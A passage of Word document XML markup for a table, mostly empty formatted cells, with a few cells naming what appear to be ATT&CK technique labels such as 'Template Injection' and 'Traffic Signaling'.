            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ABE73C2" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="076BB1D2"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49917EAF" w14:textId="0B3820DB" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Script Proxy Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DB5DEA8" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="752BC020" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A767773" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DD138F1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E8237EF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64A8C97A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A463EB0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="68180577" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28C772BC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06896713"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6043F009" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="295C6296" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="583EDBBF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E81249F"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B66D9BA" w14:textId="0351189A" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Template Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73BB990C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EEB5173" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24A09ECB" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F88885" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="199A27B1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49F16ED1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E3526A2" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="5454DAB3" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C96A6A7" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A84619C"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03A16AC7" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="628A043F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63D1C851" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01FEA6B1"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214D90EC" w14:textId="59297169" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t xml:space="preserve">Traffic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Signaling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37BD5F31" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76F9A0C8" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="619A0B85" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DB8D8B0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="675DBCF0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12263DB3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6019AED4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="7745CA12" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5656DD24" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D6E9F4B"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77E1EBB1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="311BD146" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13383A88" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F2A2D8C"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40225244" w14:textId="25F09C18" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Trusted Developer Utilities Proxy Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FBABEA9" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A314FEF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10D44517" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A6B3ED9" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F56ED37" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D71D6B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B903B75" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="527A33F0" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B661B2F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
